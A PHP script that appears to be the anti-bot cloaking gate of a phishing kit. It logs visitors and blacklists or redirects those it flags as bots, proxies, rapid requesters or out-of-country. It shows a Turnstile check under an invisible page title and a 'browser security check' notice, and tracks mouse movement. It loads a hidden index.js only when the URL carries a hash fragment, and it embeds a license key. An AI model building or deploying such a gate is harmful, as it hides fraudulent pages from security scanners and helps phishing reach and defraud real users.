<?php
require_once 'AntiBotClass.php';

// Read the config.ini file
$config = parse_ini_file('config.ini');
$expiration_time = 10 * 60;

session_start();

$antibot = new AntiBot($config); // Pass the config to AntiBot class

$ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';

// Check if IP is whitelisted
if (!empty($config['ip'])) {
    $whitelisted_ips = explode(',', $config['ip']);
    if (in_array($ip, $whitelisted_ips)) {
        // IP is whitelisted, display protected content
        displayProtectedContent();
        exit;
    }
}

// Log the access attempt if send_visit is enabled
if ($config['send_visit'] == '1') {
    $antibot->logAccess($ip, $user_agent);
}

// Set a test cookie
setcookie('cookie_test', 'test', time() + 3600, '/');

// Process any POST requests
$antibot->processPostRequest();

// Check if the user has passed verification
if (!isset($_SESSION['verified']) || time() - $_SESSION['verified'] > $expiration_time) {
    // Perform anti-bot checks
    if (
        ($config['detect_blacklist'] == '1' && $antibot->isBlacklisted($ip)) ||
        ($config['block_bot'] == '1' && $antibot->checkBot($user_agent)) ||
        ($config['detect_proxy'] == '1' && $antibot->isUsingProxy($ip)) ||
        ($config['country_code'] != '' && !$antibot->isAllowedCountry($ip)) ||
        $antibot->isRapidRequester($ip)
    ) {
        $antibot->blacklistIP($ip);
        header('Location: ' . $config['redirect_bot']);
        exit;
    }

    // If checks pass and captcha is enabled, display the captcha
    if ($config['use_capctha'] == '1') {
        displayCaptcha();
        exit;
    } else {
        $_SESSION['verified'] = time();
        displayProtectedContent();
        exit;
    }
} else {
    // User is verified, display protected content
    displayProtectedContent();
    exit;
}

// Function to display the captcha
function displayCaptcha()
{
    global $config;
    ?>
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <title>⁤</title>
        <meta charset="UTF-8">
        <meta name="robots" content="noindex, nofollow">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer></script>
        <style>
            /* Your CSS styles here */
            body {
                font-family: Arial, sans-serif;
            }
            .container {
                margin-top: 50px;
                display: flex;
                justify-content: center;
            }
            .centered-content {
                text-align: center;
                max-width: 500px;
            }
            .mt-2 {
                margin-top: .5rem;
            }
            .mt-5 {
                margin-top: 3rem;
            }
            .text-muted {
                color: #6c757d;
            }
        </style>
    </head>
    <body>
        <div class="container mt-5">
            <div class="centered-content">
                <div class="col-lg-5 text-center">
                    <div class="mt-2">
                        <form method="POST" onsubmit="sendMouseData()">
                            <span class="cf-turnstile" data-sitekey="<?php echo htmlspecialchars($config['sitekey']); ?>"
                                  data-callback="querulous"></span>
                            <input type="hidden" name="action" value="verify_captcha">
                        </form>
                    </div>
                    <div class="mt-2 text-muted" style="font-size: 14px;">Browser security check in progress.</div>
                </div>
            </div>
        </div>
        <script>
            // Set JavaScript enabled cookie
            document.cookie = "js_enabled=true; path=/";

            function querulous() {
                document.forms[0].submit();
            }

            let mouseData = [];
            document.addEventListener('mousemove', function (e) {
                mouseData.push({x: e.clientX, y: e.clientY, t: Date.now()});
            });
            document.addEventListener('click', function (e) {
                mouseData.push({x: e.clientX, y: e.clientY, t: Date.now(), click: true});
            });

            function sendMouseData() {
                var xhr = new XMLHttpRequest();
                xhr.open('POST', '', false); // Send to the same page
                xhr.setRequestHeader('Content-Type', 'application/json');
                xhr.send(JSON.stringify({action: 'save_mouse_data', mouseData: mouseData}));
            }
        </script>
    </body>
    </html>
    <?php
    exit;
}

// Function to display protected content
function displayProtectedContent()
{
    global $config;
    ?>
    <script>
	let lcs_key = "<?php echo $config['license']; ?>";

	let base_php_url = '.';
	
	let go = window.location.hash.substring(1).trim();
	
    if (go) {
		document.write(`<script src="${base_php_url}/assets/js/index.js"><\/script>`);
	}
	

</script>
    <?php
    exit;
}
?>
